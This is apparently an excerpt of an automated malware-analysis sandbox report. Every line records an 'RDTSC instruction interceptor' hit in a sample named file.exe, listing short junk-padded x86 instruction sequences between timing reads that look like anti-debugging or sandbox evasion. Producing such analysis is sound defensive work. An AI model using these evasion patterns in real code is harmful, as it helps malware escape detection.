                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6616BA second address: 6616CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 661841 second address: 661845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 661845 second address: 66187F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F99FD381EECh 0x0000000c jmp 00007F99FD381EEAh 0x00000011 popad 0x00000012 push ecx 0x00000013 push edi 0x00000014 jmp 00007F99FD381EF5h 0x00000019 pop edi 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66187F second address: 661885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 661B48 second address: 661B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 661CCE second address: 661CD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 661CD6 second address: 661CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 664E54 second address: 664E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66742A second address: 667439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F99FD381EE6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 666F93 second address: 666F99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66A32D second address: 66A347 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F99FD381EF0h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66A347 second address: 66A34D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66A34D second address: 66A355 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BB44 second address: 66BB65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E7h 0x00000007 jnl 00007F99FCCDC7D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D4932 second address: 5D4947 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EEFh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D4947 second address: 5D494C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 670D44 second address: 670D81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99FD381EECh 0x00000009 jmp 00007F99FD381EEEh 0x0000000e popad 0x0000000f jmp 00007F99FD381EEBh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F99FD381EF0h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 670D81 second address: 670D86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6815E4 second address: 6815F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F99FD381EE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6815F3 second address: 6815FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67FACB second address: 67FAD7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67FAD7 second address: 67FAF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 je 00007F99FCCDC7E8h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67FE0A second address: 67FE14 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F99FD381EF2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67FE14 second address: 67FE1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6800FC second address: 680102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 680102 second address: 680108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68099F second address: 6809A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 681031 second address: 681035 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 681035 second address: 68103B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68103B second address: 681044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 681044 second address: 68104A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 686FCD second address: 686FD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 686FD3 second address: 686FE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F99FD381EECh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 686FE0 second address: 686FF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F99FCCDC7DFh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 686FF6 second address: 686FFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 686FFC second address: 687025 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E7h 0x00000007 je 00007F99FCCDC7D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007F99FCCDC7D6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 687025 second address: 68702B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68A7C6 second address: 68A7E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 jmp 00007F99FCCDC7E3h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68A7E2 second address: 68A7F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EEAh 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F99FD381EE6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68A959 second address: 68A981 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F99FCCDC7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F99FCCDC7E8h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68A981 second address: 68A996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99FD381EF1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 692B21 second address: 692B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 692B27 second address: 692B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 692B2D second address: 692B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F99FCCDC7E8h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 692B4D second address: 692B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F99FD381EF4h 0x0000000b jmp 00007F99FD381EF2h 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push edi 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 692B82 second address: 692B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 ja 00007F99FCCDC7D6h 0x0000000c jmp 00007F99FCCDC7DAh 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 690C59 second address: 690C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 690C5F second address: 690C9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F99FCCDC7E6h 0x0000000c pushad 0x0000000d jne 00007F99FCCDC7D6h 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F99FCCDC7E9h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691116 second address: 691126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99FD381EECh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691126 second address: 691142 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F99FCCDC7EEh 0x00000008 jmp 00007F99FCCDC7E2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6913F3 second address: 691414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F99FD381EE6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F99FD381EF1h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69157E second address: 691582 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691582 second address: 691588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691693 second address: 6916C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnc 00007F99FCCDC7FDh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691B1B second address: 691B34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99FD381EF4h 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 692280 second address: 692287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69A440 second address: 69A450 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F99FD381EE6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69A450 second address: 69A471 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F99FCCDC7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007F99FCCDC7E3h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69A471 second address: 69A489 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69A180 second address: 69A189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69A189 second address: 69A18D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69A18D second address: 69A193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BA80 second address: 69BA84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BA84 second address: 69BA88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BA88 second address: 69BA90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AE1EB second address: 6AE20A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F99FCCDC7D6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jnp 00007F99FCCDC7D6h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jo 00007F99FCCDC7D6h 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ADDEE second address: 6ADE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F99FD381EF5h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ADE0A second address: 6ADE18 instructions: 0x00000000 rdtsc 0x00000002 js 00007F99FCCDC7D8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D2F2B second address: 5D2F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D2F2F second address: 5D2F47 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F99FCCDC7DDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B3035 second address: 6B304B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jbe 00007F99FD381EE6h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E23E8 second address: 5E23EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C31EB second address: 6C31F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C31F1 second address: 6C31F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CC535 second address: 6CC54C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CAF5B second address: 6CAF75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99FCCDC7E6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB36A second address: 6CB37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F99FD381EECh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB657 second address: 6CB66A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F99FCCDC7DAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB66A second address: 6CB670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB670 second address: 6CB676 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB7E0 second address: 6CB7EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB7EC second address: 6CB7F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB7F0 second address: 6CB7F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D2543 second address: 6D2547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D2547 second address: 6D254D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D8BDB second address: 6D8BE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F99FCCDC7D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E0C66 second address: 6E0C6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EDE39 second address: 6EDE45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F99FCCDC7D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EDE45 second address: 6EDE4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EDE4A second address: 6EDEBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F99FCCDC7D6h 0x00000009 jmp 00007F99FCCDC7E6h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c pushad 0x0000001d jmp 00007F99FCCDC7DFh 0x00000022 jnc 00007F99FCCDC7D6h 0x00000028 jmp 00007F99FCCDC7E5h 0x0000002d popad 0x0000002e jmp 00007F99FCCDC7E8h 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F4E7A second address: 6F4EAD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007F99FD381EF5h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jp 00007F99FD381F15h 0x00000019 push eax 0x0000001a push edx 0x0000001b jns 00007F99FD381EE6h 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F40F2 second address: 6F40F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F4776 second address: 6F4780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F4780 second address: 6F4795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F99FCCDC7D6h 0x0000000f jne 00007F99FCCDC7D6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F4795 second address: 6F479F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F99FD381EE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F479F second address: 6F47A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F490E second address: 6F491D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F99FD381EE6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F491D second address: 6F4934 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F99FCCDC7DEh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F4BBA second address: 6F4BDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF4h 0x00000007 jc 00007F99FD381EF2h 0x0000000d jc 00007F99FD381EE6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FAB8D second address: 6FAB91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
